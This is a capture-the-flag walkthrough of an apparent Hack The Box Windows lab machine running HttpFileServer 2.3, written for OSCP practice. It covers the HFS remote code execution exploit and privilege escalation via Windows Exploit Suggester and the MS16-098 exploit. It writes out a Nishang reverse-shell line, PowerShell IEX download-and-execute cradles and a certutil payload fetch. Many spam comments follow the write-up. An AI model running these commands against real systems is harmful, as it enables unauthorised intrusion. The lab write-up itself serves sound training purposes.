Note: In an attempt to be OSCP friendly, NONE of my write ups will utilize Metasploit. Zero. Zip. Tell your friends.
nMap
As always, we’ll start here with our standard nMap scan: nmap -A -p – 10.10.10.8
Not much open other than Port 80, which appears to be running HttpFileServer 2.3. Let’s start our GoBuster scan before we bring up our browser and check it out: gobuster dir -u http://10.10.10.8 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Now, let’s open up our browser and check out the site: http://10.10.10.8
Not a whole lot to work with right here at the moment, so let’s see if we can find anything regarding HttpFileServer 2.3 with Dr. Google.
Vulnerability Discovery
And the first link brings us to a Remote Code Execution (RCE) vulnerability https://www.exploit-db.com/exploits/39161
Let’s download it with wget https://www.exploit-db.com/raw/39161 re-name it, and then make it executable.
Let’s open up the script in your editor of choice, and when we do that, we notice a few things on it’s operation:
I changed the ip_addr and local_port variable to my Kali box and the port I’ll be listening on with NetCat.
And we also need to get nc.exe into our working directory and our Simple HTTP Python server started up.
Start up a NetCat listener:
And then run the script: python 39161.py 10.10.10.8 80 then check your listener.
And the user.txt flag is in the directory we’re already in.
Priv Esc – Windows Exploit Suggester
We’ll start with Windows Exploit Suggester. If you don’t already have it downloaded do that, and then update it with the following command: python windows-exploit-suggester.py –update
Next, we need to copy systeminfo from our target machine and put the contents into a file on our Kali box.
Now, we’ll use Windows Exploit Suggester to compare the list of Microsoft updates with our systeminfo file: ../Security_Repos/Windows-Exploit-Suggester/windows-exploit-suggester.py –database ../Security_Repos/Windows-Exploit-Suggester/2020-09-22-mssb.xls –systeminfo systeminfo
And there’s a few here to go through. Two stand out right away:
Let’s try them one by one.
MS16-135 – didn’t work
If we follow the link to the first Privilege Escalation exploit we’re brought to an ExploitDB page: https://www.exploit-db.com/exploits/41015/
This exploit is some C code that I haven’t jacked with much. So let’s try it. Let’s download the exploit and then copy it to our working directory. It’s called 41015.c
After downloading the code, let’s try to get it compiled for windows. We can use mingw to do this with the following command: x86_64-w64-mingw32-gcc 41015.c -o exploit.exe Here’s a link on how to compile exploits in Kali.
And I got a compile error. So a little more Googling will bring you to a PowerShell equivalent: https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16135.ps1
So let’s use wget to pull it down to our Kali box. Next, the way this script works is that it will execute a script of our choosing with admin privs, so we need a script that will give us a reverse shell when executed. Knowing that PowerShell is on this box, let’s use Invoke-PowerShellTcp.ps1 from Nishang.
Download it and add this line to the end of it: Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.20 -Port 1234
Make sure it’s in the same folder you’re running your Python HTTP Server from. Next, we want to update the Invoke-MS16135.ps1 script to execute our InvokePowerShellTcp.ps1 script when it runs. So let’s open up Invoke-MS16135.ps1 and add this line to the bottom: Invoke-MS16135 -Command “iex(New-Object Net.WebClient).DownloadString(‘http://10.10.14.20/Invoke-PowerShellTcp.ps1’)”
Now, let’s try to execute it. From the Windows machine run this: Powershell “IEX(new-object net.webclient).downloadstring(‘http://10.10.14.20/Invoke-MS16135.ps1’)”
Hrm…well we’re on a 64 bit box. So let’s try to run it with the 64 bit version of PowerShell: %SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe “IEX(new-object net.webclient).downloadstring(‘http://10.10.14.20/Invoke-MS16135.ps1’)”
And nothing. I noticed on my HTTP Server window tab that it didn’t even try to download the Invoke-PowerShellTcp.ps1 file. So, let’s try another exploit.
MS16-075 – didn’t work
System Info and Windows Exploit Suggester said this might be exploitable. However, two things stopped me from trying this. One, for the Potato attacks to work the SeImpersonate token needs to be enabled, and it’s not on this box:
Second, when I started watching the video for the Hot Potato it said you might have to wait 24 hours for it to work…and I don’t have that kinda time.
MS16-098
Let’s check out the page for this exploit: https://www.exploit-db.com/exploits/41020
This too appears to be some code in C but there’s some links to some pre-compiled versions of it in the comments of the code:
So let’s grab the file: wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
Now, let’s use CertUtil to copy it over to our Windows machine. From our Windows shell, type certutil.exe -urlcache -split -f http://10.10.14.20/41020.exe
Then run it:
Done! You can get the root flag from here.
I’ve been exploring for a little bit for any high-quality articles or weblog posts on this kind of space . Exploring in Yahoo I at last stumbled upon this web site. Reading this info So i’m satisfied to exhibit that I have a very excellent uncanny feeling I discovered just what I needed. I such a lot indisputably will make certain to don’t put out of your mind this site and provides it a glance regularly.
This really answered my problem, thanks!
Este site é realmente incrível. Sempre que consigo acessar eu encontro novidades Você também pode acessar o nosso site e descobrir mais detalhes! Conteúdo exclusivo. Venha descobrir mais agora! 🙂
Adorei este site. Para saber mais detalhes acesse o site e descubra mais. Todas as informações contidas são informações relevantes e únicos. Tudo que você precisa saber está ta lá.
Este site é realmente fantástico. Sempre que consigo acessar eu encontro coisas incríveis Você também vai querer acessar o nosso site e descobrir detalhes! Conteúdo exclusivo. Venha saber mais agora! 🙂
amei este site. Para saber mais detalhes acesse o site e descubra mais. Todas as informações contidas são conteúdos relevantes e diferentes. Tudo que você precisa saber está ta lá.
Wonderful work! This is the type of info that should be shared around the internet. Shame on the search engines for not positioning this post higher! Come on over and visit my web site . Thanks =)
I have recently started a site, the info you provide on this site has helped me tremendously. Thank you for all of your time & work. “Quit worrying about your health. It’ll go away.” by Robert Orben.
Wonderful website. A lot of useful info here. I’m sending it to several friends ans also sharing in delicious. And naturally, thanks for your effort!
Write more, thats all I have to say. Literally, it seems as though you relied on the video to make your point. You definitely know what youre talking about, why throw away your intelligence on just posting videos to your weblog when you could be giving us something enlightening to read?
There are actually loads of particulars like that to take into consideration. That could be a nice point to deliver up. I provide the ideas above as normal inspiration but clearly there are questions just like the one you bring up where crucial factor might be working in honest good faith. I don?t know if best practices have emerged round things like that, but I am sure that your job is clearly identified as a good game. Both girls and boys really feel the influence of just a moment’s pleasure, for the remainder of their lives.
Outstanding post, I conceive website owners should acquire a lot from this blog its very user genial.
I have been absent for some time, but now I remember why I used to love this blog. Thanks , I¦ll try and check back more frequently. How frequently you update your web site?
Some genuinely nice and useful info on this internet site, also I conceive the design and style holds good features.
I’m truly enjoying the design and layout of your website. It’s a very easy on the eyes which makes it much more pleasant for me to come here and visit more often. Did you hire out a designer to create your theme? Outstanding work!
Magnificent website. Lots of useful info here. I am sending it to some friends ans also sharing in delicious. And naturally, thanks to your effort!
I don’t usually comment but I gotta admit regards for the post on this one : D.
As a Newbie, I am continuously browsing online for articles that can be of assistance to me. Thank you
Heya! I just wanted to ask if you ever have any trouble with hackers? My last blog (wordpress) was hacked and I ended up losing several weeks of hard work due to no backup. Do you have any methods to prevent hackers?
Do you mind if I quote a couple of your posts as long as I provide credit and sources back to your website? My website is in the exact same niche as yours and my users would really benefit from some of the information you provide here. Please let me know if this ok with you. Thanks a lot!
fascinate este conteúdo. Gostei bastante. Aproveitem e vejam este conteúdo. informações, novidades e muito mais. Não deixem de acessar para saber mais. Obrigado a todos e até a próxima. 🙂
Hello, Neat post. There is a problem together with your web site in web explorer, may test thisK IE nonetheless is the marketplace chief and a good element of other folks will leave out your great writing due to this problem.
I just couldn’t leave your website before suggesting that I actually loved the usual info an individual supply in your visitors? Is going to be back often to check up on new posts.
Good web site! I truly love how it is simple on my eyes and the data are well written. I am wondering how I might be notified when a new post has been made. I have subscribed to your feed which must do the trick! Have a great day!
I have not checked in here for some time because I thought it was getting boring, but the last several posts are good quality so I guess I will add you back to my everyday bloglist. You deserve it my friend 🙂
Thanks for this post, I am a big big fan of this website would like to continue updated.
Keep working ,splendid job!
Well I really enjoyed reading it. This post provided by you is very practical for good planning.
whoah this weblog is excellent i like studying your posts. Keep up the good paintings! You understand, a lot of individuals are hunting round for this information, you can aid them greatly.
I have fun with, cause I found exactly what I used to be taking a look for. You have ended my 4 day long hunt! God Bless you man. Have a great day. Bye
After study a few of the blog posts on your website now, and I truly like your way of blogging. I bookmarked it to my bookmark website list and will be checking back soon. Pls check out my web site as well and let me know what you think.
**synaptigen**
synaptigen is a next-generation brain support supplement that blends natural nootropics, adaptogens
I just could not go away your web site before suggesting that I extremely loved the standard information a person provide on your visitors? Is gonna be again frequently to check up on new posts
I am continually invstigating online for articles that can facilitate me. Thx!
Hmm it looks like your site ate my first comment (it was super long) so I guess I’ll just sum it up what I had written and say, I’m thoroughly enjoying your blog. I as well am an aspiring blog blogger but I’m still new to everything. Do you have any points for inexperienced blog writers? I’d genuinely appreciate it.
It’s appropriate time to make some plans for the long run and it’s time to be happy. I’ve read this publish and if I could I wish to counsel you few attention-grabbing things or advice. Perhaps you could write subsequent articles relating to this article. I want to learn even more things about it!
It is actually a great and useful piece of information. I am glad that you shared this useful information with us. Please stay us informed like this. Thank you for sharing.
Undeniably believe that which you stated. Your favorite reason seemed to be on the internet the easiest thing to be aware of. I say to you, I certainly get irked while people consider worries that they plainly don’t know about. You managed to hit the nail upon the top as well as defined out the whole thing without having side effect , people could take a signal. Will likely be back to get more. Thanks
I simply couldn’t depart your web site prior to suggesting that I really loved the usual info an individual supply in your guests? Is gonna be back frequently to check out new posts.
Thankyou for this terrific post, I am glad I observed this website on yahoo.
I loved up to you will obtain carried out right here. The caricature is attractive, your authored subject matter stylish. nonetheless, you command get bought an shakiness over that you want be handing over the following. ill indubitably come further in the past once more as precisely the same just about a lot steadily inside case you protect this increase.
pishtl
Wow, incredible blog format! How long have you been running a blog for? you make blogging look easy. The entire glance of your website is excellent, let alone the content!
Pretty section of content. I just stumbled upon your weblog and in accession capital to assert that I get actually enjoyed account your blog posts. Anyway I will be subscribing to your feeds and even I achievement you access consistently fast.